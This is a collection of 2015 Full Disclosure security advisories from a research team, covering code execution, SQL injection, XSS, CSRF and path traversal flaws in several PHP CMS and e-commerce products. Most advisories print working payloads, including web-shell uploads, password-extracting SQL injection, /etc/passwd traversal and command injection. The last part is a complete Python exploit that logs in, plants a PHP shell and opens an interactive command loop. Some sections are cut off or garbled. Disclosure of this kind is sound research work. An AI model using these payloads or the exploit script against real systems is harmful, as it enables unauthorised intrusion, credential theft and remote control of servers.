Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
Grawlix is a CMS for publishing comics, which is written in PHP.
When uploading an image icon for a link, neither the file type nor the file
extension are checked, leading to code execution.
It should be noted that admin credentials are required to upload an icon, and
that because of a bug when uploading icons, the upload only works if Grawlix is
installed in the root directory.
3. Proof of Concept
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/_admin/site.link-list.php";, true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---172718417319970434061213874184");
xhr.withCredentials = true;
var body = "-172718417319970434061213874184\r\n" +
"Content-Disposition: form-data; name=\"input[title]\"\r\n" +
"\r\n" +
"Site name\r\n" +
"-172718417319970434061213874184\r\n" +
"Content-Disposition: form-data; name=\"input[url]\"\r\n" +
"\r\n" +
"http://google.com\r\n"; +
"-172718417319970434061213874184\r\n" +
"Content-Disposition: form-data; name=\"icon_file\";
filename=\"test.php\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\x3c?php \n" +
"passthru($_GET[\'x\']);\n" +
"\r\n" +
"-172718417319970434061213874184\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"save\r\n" +
"-172718417319970434061213874184--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-Code-Execution-127.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Arastta 1.1.5: SQL Injection
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Arastta 1.1.5
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Arastta is an eCommerce software written in PHP. In version 1.1.5, it is
vulnerable to two SQL injection vulnerabilities, one normal injection when
searching for products via tags, and one blind injection via the language
setting. Both of them require a user with special privileges to trigger.
3. SQL Injection 1
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when retrieving products.
Currently, only the "filter" variable is vulnerable. Note that the "tag_name"
variable would also be vulnerable to SQL injection, if there wasn't a filter
that forbid single quotes in the URL. As defense in depth, it might be a good
idea to sanitize that value here as well.
Note that an account with the right "Catalog -> Filters" is needed to exploit
this issue.
Proof of Concept
POST
/Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name=
HTTP/1.1
tag_text[][value]=abc') union all select password from gv4_user -- -
Code
/admin/model/catalog/product.php
public function getTags($tag_name, $filter_tags = null) {
[...]
$query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX .
"product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);
/admin/controller/catalog/product.php
public function autocomplete() {
[...]
if (isset($this->request->get['tag_name'])) {
$this->load->model('catalog/product');
if (isset($this->request->get['tag_name'])) {
$tag_name = $this->request->get['tag_name'];
} else {
$tag_name = '';
}
$filter = null;
if(isset($this->request->post['tag_text'])) {
$filter = $this->request->post['tag_text'];
}
$results = $this->model_catalog_product->getTags($tag_name, $filter);
foreach ($results as $result) {
$json[] = array(
'tag' => $result,
'tag_id' => $result
);
}
}
4. SQL Injection 2
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is a second order timing based SQL injection when choosing the language
setting.
An admin account with the right "Setting -> Setting" is needed to exploit this
issue.
Alternatively, a user with the right "Localisation -> Languages" can inject a
payload as well. However, a user with the right "Setting -> Setting" is still
needed to choose the malicious language to trigger the payload.
Proof of Concept
Visit the setting page:
http://localhost/Arastta/admin/index.php?route=setting/setting
For the config_language and config_admin_language parameters use:
en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5
seconds')),null) -- -
Visiting any site will trigger the injected code.
Code
/Arastta/system/library/utility.php
public function getDefaultLanguage(){
if (!is_object($this->config)) {
return;
}
$store_id = $this->config->get('config_store_id');
if (Client::isAdmin()){
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` =
'config_admin_language' AND `store_id` = '" . $store_id . "'";
} else {
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language'
AND `store_id` = '" . $store_id . "'";
}
$query = $this->db->query($sql);
$code = $query->row['value'];
$language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE
`code` = '" . $code . "'");
return $language->row;
}
5. Solution
This issue was not fixed by the vendor.
6. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Arastta 1.1.5: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Arastta 1.1.5 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://arastta.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Arastta is an eCommerce software written in PHP. In version 1.1.5, a given URL is echoed unencoded, leading to XSS. This can be used to inject JavaScript keyloggers or to bypass CSRF protection. If the victim is an admin with the right "Tool -> File Manager", this can lead to code execution via the file manager. 3. Proof of Concept http://localhost/Arastta/index.php/desktops/pc";>alert(1)?sort=pd.name&order=DESC 4. Code /catalog/view/theme/default/template/common/header.tpl 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/17/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Arastta-115-XSS-132.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PhpSocial v2.0.0304: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PhpSocial v2.0.0304_2026 Fixed in:not fixed Fixed Version Link: n/a Vendor Webite: http://phpsocial.net Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description PhpSocial is a social networking software written in PHP. In version v2.0.0304, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. 3. Proof of Concept Add a new admin: http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/admin/AdminAddViewadmins.php"; method="POST"> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/21/ Contacted Vendor (no reply) 2015 12/10/ Tried to remind vendor (no email is given, secur...@phpsocial.net does 2015 not exist, and contact form could not be used because the website is down) 12/21/ Disclosed to public 2015 Blog Reference: https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PhpSocial v2.0.0304: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PhpSocial v2.0.0304_2026 Fixed in:not fixed Fixed Version Link: n/a Vendor Webite: http://phpsocial.net Vulnerability Type: XSS / Open Redirect Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description PhpSocial is a social networking software written in PHP. In version v2.0.0304, the profile fields Name, Birthday, Street Address, City, State, Country, and Phone Number are open to persistent XSS. This can lead to the stealing of cookies, injection of JavaScript keyloggers, and bypassing of CSRF protection. In this case, this can lead to code execution via the template editor. 3. Proof of Concept Visit Profile: http://localhost/PhpSocial_v2.0.0304_2026/cms_phpsocial/ Profile.php?user=[USERNAME] Click edit and use the following for any of the vulnerable fields: 4. Open Redirect CVSS Low 2.1 AV:N/AC:H/Au:S/C:N/I:P/A:N Description PhpSocial is also vulnerable to a reflected open redirect, which may for example be used in phishing attacks. The attack only works if the victim is logged in to PhpSocial. Proof of Concept http://localhost//PhpSocial_v2.0.0304_2026/cms_phpsocial/ UserEditprofileStatus.php?status_new=foobar&task=dosave&return_url=http:// google.com 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/ Contacted Vendor (no reply) 2015 12/10/ Tried to remind vendor (no email is given, secur...@phpsocial.net does 2015 not exist, and contact form could not be used because the website is down) 12/21/ Disclosed to public 2015 Blog Reference: https://blog.curesec.com/article/blog/PhpSocial-v200304-XSS-134.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] appRain 4.0.3: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:appRain 4.0.3
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: i...@apprain.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode:Full Disclosure
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Overview
appRain is described as a Content Management Framework written in PHP.
There are various components of appRain 4.0.3 that should not provide the
possibility of code execution or arbitrary file upload but do allow it.
All of these issues are by default present in the admin area. It should be
noted that admins already have code execution via a designated PHP file editor.
Still, the code of appRain is explicitly intended to be extended by its users,
which means that components such as a seemingly secure file uploader, an image
uploader, or a function decoding json should not lead to code execution.
3. Unrestricted Upload of File with Dangerous Type 1
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
The file upload uses a blacklist for the file extension to forbid the upload of
files with dangerous type. The disallowed extensions are:
php,php3,php4,exe,pl,py,bat,sys,dev,sh
However, files that can be uploaded and that also lead to code execution are
.htaccess, as well as files with extension pht, php5, and phtml.
The file upload can be found here:
http://localhost/apprain/admin/filemanager
An admin account is required to use the file manager. It should be noted that
an admin already has code execution via the designated PHP file editor. Still,
this is an access violation in the context of this component and will also be
an issue if users reuse the varifyFileName function in different contexts,
which is to be expected.
Code
/development/controllers/admin.php
if(!App::Module('Filemanager')->varifyFileName($this->data['filemanager']['image']['name'])){
App::Module('Notification')->Push("File({$this->data['filemanager']['image']['name']})
is restricted to uploaded.","Error");
App::Config()->redirect("/admin/filemanager/upload");
}
else {
$path = App::Config()->filemanagerDir(DS);
$data =
App::Utility()->upload($this->data['filemanager']['image'],$path);
App::Module('Notification')->Push("File({$data['file_name']})
uploaded successfully.");
App::Config()->redirect("/admin/filemanager");
}
/apprain/base/modules/filemanager.php
public function varifyFileName($filename){
$restrictedExt =
explode(',',app::__def()->sysConfig('FILE_MANAGER_RESTRICTED_EXT'));
return
!in_array(App::Utility()->getExt($filename),$restrictedExt);
}
/development/definition/system_configuration/config.xml:
4. Unrestricted Upload of File with Dangerous Type 2
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When creating a new slide, the label suggests that only images with extensions
"*.jpeg, *.gif" may be uploaded. However, arbitrary files can be uploaded,
including .php or .pht files.
An admin account is required to create new slides. It should be noted that an
admin already has code execution via the designated PHP file editor. Still,
this is an access violation in the context of this component and may also be an
issue if users reuse the involved functions in different contexts.
Proof of Concept
POST /apprain/information/manage/appslide/add HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4d7rqc7hj3ej5j403nf4ktmq42
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---418924992299141519661615194
Content-Length: 1178
-418924992299141519661615194
Content-Disposition: form-data; name="data[Option][title]"
test
-418924992299141519661615194
Content-Disposition: form-data; name="data[Option][image]"; filename="test.pht"
Content-Type: application/octet-stream
test
-418924992299141519661615194
Content-Disposition: form-data; name="data[Option][status]"
Active
-418924992299141519661615194
Content-Disposition: form-data; name="Button[button_save]"
Save
-418924992299141519661615194
Content-Disposition: form-data; name="data[Information][id]"
-418924992299141519661615194
Content-Disposition: form-data; name="data[Information][type]"
appslide
-418924992299141519661615194
Content-Disposition: form-data; name="data[Information][page]"
-418924992299141519661615194--
5. Possibly Code Execution
CVSS
High 7.6AV:N/AC:H/Au:N/C:
[FD] appRain 4.0.3: CSRF
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: appRain 4.0.3
Fixed in: Fixed via Optional Module
CSRF Protection Module http://www.apprain.com/extension/20/accounting-system?s
Link: =Description
Vendor Website: i...@apprain.com
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public:12/02/2015
Release mode: Coordinated release
CVE:requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
None of the requests have CSRF protection. This means that an attacker can
execute actions for an admin if the admin visits an attacker controlled website
while logged in.
3. Proof of Concept
Add new Admin:
http://localhost/apprain-source-4.0.3/admin/manage/add/";
method="POST">
Code Execution (using the PHP file editor):
http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php";
method="POST">
http://www.opensource.org/licenses/mit-license.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to lice...@apprain.com so we can send you a copy immediately.
*
* @copyright Copyright (c) 2010 appRain, Team. (http://www.apprain.com)
* @licensehttp://www.opensource.org/licenses/mit-license.php MIT license
*
* HELP
*
* Official Website
* http://www.apprain.com/
*
* Download Link
* http://www.apprain.com/download
*
* Documents Link
* http ://www.apprain.com/docs
*/
if (version_compare(phpversion(), '5.1.0', '<') === true) {
die("Whoops, it looks like you have an invalid PHP
version.appRain supports PHP 5.1.0 or newer.");
}
$appLoc = "../app.php";
if (!file_exists($appLoc)) {
die("appRain core file(s) missing... Get a new copy ");
}
error_reporting(E_ALL);
require_once $appLoc;
umask(0);
App::Run();
passthru($_GET['x']);" />
The injected code can now be executed here:
http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls
4. Solution
To mitigate this issue please install the "Data Exchange Security" module:
http://www.apprain.com/extension/20/accounting-system?s=Description
5. Report Timeline
10/02/ Informed Vendor. Mailbox i...@apprain.com is full, used
2015 secur...@apprain.com instead (no reply)
10/21/ Reminded Vendor of Disclosure Date
2015
10/21/ Vendor announces fix
2015
~11/02/ Vendor releases optional module for CSRF protection
2015
11/04/ Suggested to vendor that CSRF protection should not be optional (no
2015 reply)
11/17/ CVE Requested (no reply)
2015
12/02/ Disclosed to public
2015
Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] appRain 4.0.3: Path Traversal
Security Advisory - Curesec Research Team 1. Introduction Affected Product:appRain 4.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: i...@apprain.com Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode:Full Disclosure CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description The "loc" Parameter of the appeditor is vulnerable to directory traversal, which allows the viewing of arbitrary files. Admin credentials are required to view files. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component. 3. Proof of Concept http://localhost/apprain-source-4.0.3/appeditor?loc=../../../../../../../etc/passwd 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 10/02 Informed Vendor. Mailbox i...@apprain.com is full, used /2015 secur...@apprain.com instead (no reply) 10/21 Reminded Vendor of Disclosure Date /2015 10/21 Vendor anounces fix for 11/02/2015 /2015 11/04 No fix released, extended public disclosure date to 11/11/2015 /2015 11/17 CVE Requested (no reply) /2015 11/24 Reminded Vendor of release date, extended date to 12/02/2015 and offered /2015 extension if needed (no reply) 12/02 Disclosed to public /2015 Blog Reference: https://blog.curesec.com/article/blog/appRain-403-Path-Traversal-113.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] appRain 4.0.3: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:appRain 4.0.3
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: i...@apprain.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode:Full Disclosure
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Overview
There are two reflected XSS vulnerabilities in appRain 4.0.3. This can lead to
the injection of JavaScript keyloggers or the bypassing of CSRF protection. In
the case of appRain, this may lead to code execution.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
The search of the file manager echoes user input without encoding, leading to
reflected XSS.
Proof of Concept
http://localhost/apprain-source-4.0.3/admin/filemanager/upload";
method="POST">
alert(1)" />
Code
/apprain/base/modules/toolbar.php
private function btnFilemanagerSrcBox($srcstr = "")
{
$html = '
';
return array('box' => $html);
}
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
The appeditor echoes the given file name and path without encoding, leading to
reflected XSS.
Proof of Concept
http://localhost/apprain-source-4.0.3/appeditor?loc='">alert(1)
Code
/component/appeditor/controllers/appeditor/index.phtml
X
5. Solution
This issue was not fixed by the vendor.
6. Report Timeline
10/02 Informed Vendor. Mailbox i...@apprain.com is full, used
/2015 secur...@apprain.com instead (no reply)
10/21 Reminded Vendor of Disclosure Date
/2015
10/21 Vendor anounces fix for 11/02/2015
/2015
11/04 No fix released, extended public disclosure date to 11/11/2015
/2015
11/05 Vendor asks for list of organizations that may help implementing fixes
/2015
11/11 Replied that we do not have lists, and that we do not have the resources
/2015 to implement fixes ourselves. Extended release date to 11/18/2015 and
offered further extension if needed (no reply)
11/17 CVE Requested (no reply)
/2015
11/24 Reminded Vendor of release date, extended date to 12/02/2015 and offered
/2015 extension if needed (no reply)
12/02 Disclosed to public
/2015
Blog Reference:
https://blog.curesec.com/article/blog/appRain-403-XSS-115.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] redaxscript 2.5.0: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:redaxscript 2.5.0
Fixed in:module has been removed in version 2.6.0
Fixed Version Link: n/a
Vendor Contact: i...@redaxmedia.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
The module file_manager allows for file uploads, and uses exif_imagetype to
check the validity of the file.
By setting the first bytes of the uploaded file to that of a valid image type,
an attacker can easily bypass this check and thus upload files of dangerous
type.
It should be noted that only files with the name index.php will be executed, as
access to all other PHP files is forbidden by a htaccess file.
An account that has access to the module "File manager" is needed to exploit
this issue.
3. Code
/modules/file_manager/index.php
function file_manager_upload($directory = '')
{
$file = $_FILES['file']['tmp_name'];
$file_name = file_manager_clean_file_name($_FILES['file']['name']);
$file_size = $_FILES['file']['size'];
/* validate post */
if (function_exists('exif_imagetype'))
{
if (exif_imagetype($file) == '')
{
$error = l('file_type_limit', '_file_manager') .
l('point');
}
}
4. Solution
To mitigate this issue please remove the file_manager module.
5. Report Timeline
10/02/2015 Informed Vendor about Issue
11/15/2015 Vendor removes affected module
12/02/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/redaxscript-250-Code-Execution-116.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] redaxscript 2.5.0: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product: redaxscript 2.5.0 Fixed in: 2.6.1 Fixed Version Link: http://redaxscript.com/files/releases/ redaxscript_2.6.1_full.zip Vendor Contact: i...@redaxmedia.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to12/02/2015 public: Release mode: Coordinated release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description There is a persistent XSS vulnerability when leaving comments. It requires the admin to hover over a link to trigger the injected code. This issue can lead to the injection of JavaScript keyloggers, or the bypassing of CSRF protection. In this case, this may lead to code execution. The issue has been partially fixed in version 2.6.0. However, it was still possible to inject a style attribute, making XSS in older browsers possible. This has been fixed in version 2.6.1. 3. Proof of Concept 1. Create a comment, as comment text use: comment" onmouseover=alert(1) foo=" 2. In the sidebar, hover over the comment to trigger the XSS. 4. Solution To mitigate this issue please upgrade at least to version 2.6.1: http://redaxscript.com/files/releases/redaxscript_2.6.1_full.zip Please note that a newer version might already be available. 5. Report Timeline 10/02/2015 Informed Vendor about Issue 11/15/2015 Vendor releases partial fix 11/24/2015 Informed vendor that fix is incomplete 11/25/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/redaxscript-250-XSS-118.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Geeklog 2.1.0: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Geeklog 2.1.0
Fixed in:2.1.1b3
Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact: geeklog-secur...@lists.geeklog.net
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Overview
The admin area of Geeklog suffers from two vulnerabilities that can lead to
code execution: OS Command Injection and Upload of Files with Dangerous Type.
The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,
the OS command injection in version 2.1.1b3.
3. Upload of Files with Dangerous Type
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading a file, the file type check is performed only client-side. An
attacker can easily bypass this check and thus upload files of dangerous types,
such as PHP files.
To upload files, an attacker needs a registered user that is in the group
"Filemanager Admin".
Proof of Concept
POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php
HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data;
boundary=---10717364298700964751730232773
Cookie: [cookies]
-10717364298700964751730232773
Content-Disposition: form-data; name="mode"
add
-10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"
/var/www/geeklog-2.1.0/public_html/images/
-10717364298700964751730232773
Content-Disposition: form-data; name="filepath"
test.png
-10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png
http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'
4. OS Command Injection
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When performing a database backup, various settings are passed unsanitized to
exec, leading to code execution.
To exploit this issue, an attacker needs a registered user that is in the group
"Root".
Proof of Concept
1. Change "Backup File Name Mask" in
http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo " shell.php;"
2. Perform database backup here:
http://localhost/geeklog-2.1.0/public_html/admin/database.php
The injected commands will be executed.
In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command
injection is still possible, including the creation of a PHP shell by appending
the injected PHP code to an existing PHP file without closing tags:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >>
../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"
Code
/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
$filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
exec($command);
5. Solution
To mitigate this issue please upgrade at least to version 2.1.1b3:
https://www.geeklog.net/filemgmt/visit.php/1156
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Geeklog 2.1.0: Code Execution Exploit
#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
import sys
import re
import argparse
import requests # requires requests lib
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()
url = args.url
username = args.username
password = args.password
loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"
shellFileName = "404.php"
shellContent = "',
csrfRequest.text)
return csrfTokenRegEx.group(1)
def injectCommand(requestSession, url):
csrfToken = getCSRFToken(requestSession, url)
postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group":
"0", "form_submit": "true", "mysqldump_filename_mask":
'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' +
shellFileName + ';"'}
requestSession.post(url, data = postData)
def executeCommand(requestSession, url):
csrfToken = getCSRFToken(requestSession, url)
requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: could not log in")
print("injecting command")
injectCommand(requestSession, url + configPath)
print("executing command")
executeCommand(requestSession, url + backupPath)
runShell(url + "/admin/" + shellFileName + "?x=")
Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html
--
blog: https://blog.curesec.com
